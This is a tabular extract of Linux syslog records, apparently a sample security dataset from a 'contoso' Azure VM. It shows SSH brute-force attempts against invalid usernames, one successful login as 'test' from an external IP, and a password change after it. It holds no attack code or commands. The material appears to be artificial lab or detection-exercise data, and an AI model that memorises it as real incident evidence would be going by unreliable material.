+832,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:08:17,UbuntuDevEnv,2019-06-26 18:08:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+833,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:08:19,UbuntuDevEnv,2019-06-26 18:08:19,auth,UbuntuDevEnv,info,Failed password for invalid user zope from 157.230.190.1 port 45692 ssh2,59209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zope,157.230.190.1,45692,,
+834,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:08:19,UbuntuDevEnv,2019-06-26 18:08:19,auth,UbuntuDevEnv,info,Disconnected from invalid user zope 157.230.190.1 port 45692 [preauth],59209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zope,157.230.190.1,45692,,
+835,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:08:19,UbuntuDevEnv,2019-06-26 18:08:19,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 45692:11: Bye Bye [preauth],59209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,45692,,
+836,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:09:11,UbuntuDevEnv,2019-06-26 18:09:11,auth,UbuntuDevEnv,info,Invalid user ts3 from 54.37.66.73 port 56402,59402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,54.37.66.7,56402,,
+837,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:09:11,UbuntuDevEnv,2019-06-26 18:09:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+838,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:09:11,UbuntuDevEnv,2019-06-26 18:09:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,59402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+839,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:09:13,UbuntuDevEnv,2019-06-26 18:09:12,auth,UbuntuDevEnv,info,Failed password for invalid user ts3 from 54.37.66.73 port 56402 ssh2,59402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,54.37.66.7,56402,,
+840,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:09:13,UbuntuDevEnv,2019-06-26 18:09:12,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 56402:11: Bye Bye [preauth],59402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,56402,,
+841,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:09:13,UbuntuDevEnv,2019-06-26 18:09:12,auth,UbuntuDevEnv,info,Disconnected from invalid user ts3 54.37.66.73 port 56402 [preauth],59402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,54.37.66.7,56402,,
+842,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:09:17,UbuntuDevEnv,2019-06-26 18:09:16,auth,UbuntuDevEnv,info,Invalid user hcat from 58.87.109.107 port 43136,59413,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hcat,58.87.109.1,43136,,
+843,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:09:17,UbuntuDevEnv,2019-06-26 18:09:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.87.109.107,59413,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,58.87.109.1,,0,
+844,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:09:17,UbuntuDevEnv,2019-06-26 18:09:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59413,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+845,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:09:19,UbuntuDevEnv,2019-06-26 18:09:18,auth,UbuntuDevEnv,info,Failed password for invalid user hcat from 58.87.109.107 port 43136 ssh2,59413,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hcat,58.87.109.1,43136,,
+846,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:09:19,UbuntuDevEnv,2019-06-26 18:09:19,auth,UbuntuDevEnv,info,Disconnected from invalid user hcat 58.87.109.107 port 43136 [preauth],59413,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hcat,58.87.109.1,43136,,
+847,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:09:19,UbuntuDevEnv,2019-06-26 18:09:19,auth,UbuntuDevEnv,info,Received disconnect from 58.87.109.107 port 43136:11: Bye Bye [preauth],59413,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,43136,,
+848,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:03,UbuntuDevEnv,2019-06-26 18:10:03,auth,UbuntuDevEnv,info,Invalid user sinusbot from 157.230.190.1 port 34026,59578,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot,157.230.190.1,34026,,
+849,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:03,UbuntuDevEnv,2019-06-26 18:10:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59578,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+850,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:03,UbuntuDevEnv,2019-06-26 18:10:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,59578,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+851,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:11:31,UbuntuDevEnv,2019-06-26 18:11:30,auth,UbuntuDevEnv,info,Connection closed by 104.47.157.103 port 45034 [preauth],59899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.47.157.1,45034,,
+852,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:06,UbuntuDevEnv,2019-06-26 18:12:05,auth,UbuntuDevEnv,info,Accepted password for test from 58.87.109.107 port 10543 ssh2,60023,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,58.87.109.1,10543,,
+853,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:06,UbuntuDevEnv,2019-06-26 18:12:05,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user test by (uid=0),60023,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,,,0,
+854,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:06,UbuntuDevEnv,2019-06-26 18:12:06,auth,UbuntuDevEnv,info,New session 1722 of user test.,1161,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,,,,
+855,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:06,UbuntuDevEnv,2019-06-26 18:12:06,authpriv,UbuntuDevEnv,info,pam_unix(systemd-user:session): session opened for user test by (uid=0),,10.0.1.4,systemd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,,,0,
+856,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:09,UbuntuDevEnv,2019-06-26 18:12:09,auth,UbuntuDevEnv,info,Invalid user sinusbot from 54.37.66.73 port 45404,60078,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot,54.37.66.7,45404,,
+857,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:09,UbuntuDevEnv,2019-06-26 18:12:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,60078,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+858,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:09,UbuntuDevEnv,2019-06-26 18:12:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60078,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+859,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:11,UbuntuDevEnv,2019-06-26 18:12:11,auth,UbuntuDevEnv,info,Failed password for invalid user sinusbot from 54.37.66.73 port 45404 ssh2,60078,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot,54.37.66.7,45404,,
+860,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:11,UbuntuDevEnv,2019-06-26 18:12:11,auth,UbuntuDevEnv,info,Disconnected from invalid user sinusbot 54.37.66.73 port 45404 [preauth],60078,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot,54.37.66.7,45404,,
+861,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:11,UbuntuDevEnv,2019-06-26 18:12:11,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 45404:11: Bye Bye [preauth],60078,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,45404,,
+862,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:13,UbuntuDevEnv,2019-06-26 18:12:12,auth,UbuntuDevEnv,info,Invalid user nproc from 58.87.109.107 port 12035,60201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nproc,58.87.109.1,12035,,
+863,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:13,UbuntuDevEnv,2019-06-26 18:12:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+864,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:13,UbuntuDevEnv,2019-06-26 18:12:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.87.109.107,60201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,58.87.109.1,,0,
+865,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:15,UbuntuDevEnv,2019-06-26 18:12:14,auth,UbuntuDevEnv,info,Failed password for invalid user nproc from 58.87.109.107 port 12035 ssh2,60201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nproc,58.87.109.1,12035,,
+866,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:15,UbuntuDevEnv,2019-06-26 18:12:15,auth,UbuntuDevEnv,info,Received disconnect from 58.87.109.107 port 12035:11: Bye Bye [preauth],60201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,12035,,
+867,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:15,UbuntuDevEnv,2019-06-26 18:12:15,auth,UbuntuDevEnv,info,Disconnected from invalid user nproc 58.87.109.107 port 12035 [preauth],60201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nproc,58.87.109.1,12035,,
+868,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:16,UbuntuDevEnv,2019-06-26 18:12:16,authpriv,UbuntuDevEnv,notice,pam_unix(passwd:chauthtok): password changed for test,60226,10.0.1.4,passwd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+869,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:18,UbuntuDevEnv,2019-06-26 18:12:17,authpriv,UbuntuDevEnv,notice,pam_unix(passwd:chauthtok): authentication failure  logname= uid=1001 euid=0 tty= ruser= rhost=  user=test,60237,10.0.1.4,passwd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,,,1001,
+870,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:18,UbuntuDevEnv,2019-06-26 18:12:17,auth,UbuntuDevEnv,info,Invalid user redmine from 107.175.127.237 port 54902,60216,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,redmine,107.175.127.2,54902,,
+871,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:18,UbuntuDevEnv,2019-06-26 18:12:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60216,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+872,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:18,UbuntuDevEnv,2019-06-26 18:12:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,60216,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+873,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:19,UbuntuDevEnv,2019-06-26 18:12:19,auth,UbuntuDevEnv,info,Failed password for invalid user redmine from 107.175.127.237 port 54902 ssh2,60216,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,redmine,107.175.127.2,54902,,
+874,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:19,UbuntuDevEnv,2019-06-26 18:12:19,auth,UbuntuDevEnv,info,Disconnected from invalid user redmine 107.175.127.237 port 54902 [preauth],60216,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,redmine,107.175.127.2,54902,,
+875,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:19,UbuntuDevEnv,2019-06-26 18:12:19,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 54902:11: Bye Bye [preauth],60216,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,54902,,
+876,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:35,UbuntuDevEnv,2019-06-26 18:12:34,auth,UbuntuDevEnv,info,Invalid user hadoop from 45.77.171.173 port 45536,60340,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,45.77.171.1,45536,,
+877,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:35,UbuntuDevEnv,2019-06-26 18:12:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60340,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+878,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:35,UbuntuDevEnv,2019-06-26 18:12:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.77.171.173,60340,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.77.171.1,,0,
+879,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:35,UbuntuDevEnv,2019-06-26 18:12:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.87.109.107  user=test,60337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,58.87.109.1,,0,
+880,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:37,UbuntuDevEnv,2019-06-26 18:12:36,auth,UbuntuDevEnv,info,Failed password for invalid user hadoop from 45.77.171.173 port 45536 ssh2,60340,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,45.77.171.1,45536,,
+881,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:37,UbuntuDevEnv,2019-06-26 18:12:36,auth,UbuntuDevEnv,info,Failed password for test from 58.87.109.107 port 14697 ssh2,60337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,14697,,
+882,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:37,UbuntuDevEnv,2019-06-26 18:12:36,auth,UbuntuDevEnv,info,Disconnected from invalid user hadoop 45.77.171.173 port 45536 [preauth],60340,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,45.77.171.1,45536,,
+883,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:37,UbuntuDevEnv,2019-06-26 18:12:36,auth,UbuntuDevEnv,info,"Received disconnect from 45.77.171.173 port 45536:11: Normal Shutdown, Thank you for playing [preauth]",60340,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.77.171.1,45536,,
+884,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:38,UbuntuDevEnv,2019-06-26 18:12:37,auth,UbuntuDevEnv,info,Received disconnect from 58.87.109.107 port 14697:11: Bye Bye [preauth],60337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,14697,,
+885,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:38,UbuntuDevEnv,2019-06-26 18:12:37,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 58.87.109.107 port 14697 [preauth],60337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,58.87.109.1,14697,,
+886,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:49,UbuntuDevEnv,2019-06-26 18:12:49,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session closed for user test,60023,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,,,,
+887,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:13:30,UbuntuDevEnv,2019-06-26 18:13:30,auth,UbuntuDevEnv,info,Invalid user tomberli from 157.230.190.1 port 38936,60568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomberli,157.230.190.1,38936,,
+888,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:13:30,UbuntuDevEnv,2019-06-26 18:13:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+889,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:13:30,UbuntuDevEnv,2019-06-26 18:13:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,60568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+890,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:13:32,UbuntuDevEnv,2019-06-26 18:13:31,auth,UbuntuDevEnv,info,Failed password for invalid user tomberli from 157.230.190.1 port 38936 ssh2,60568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomberli,157.230.190.1,38936,,
+891,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:13:32,UbuntuDevEnv,2019-06-26 18:13:31,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 38936:11: Bye Bye [preauth],60568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,38936,,
